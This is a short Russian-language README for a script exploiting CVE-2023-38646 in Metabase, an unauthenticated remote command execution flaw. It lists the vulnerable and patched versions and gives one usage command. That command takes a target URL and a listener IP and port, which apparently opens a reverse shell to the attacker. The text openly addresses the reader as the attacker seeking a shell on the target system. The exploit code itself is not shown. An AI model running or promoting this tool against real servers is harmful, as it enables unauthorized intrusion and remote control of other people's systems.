
Этот скрипт предназначен для эксплуатации уязвимых версий программного обеспечения Metabase, предоставляя атакующему shell.
Metabase open source до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с его уровнем привилегий. Для эксплуатации не требуется аутентификация. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.
Если версия Metabase уязвима, этот скрипт позволит вам, как атакующему, получить shell-соединение с целевой системой.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Автор: @birdm4nw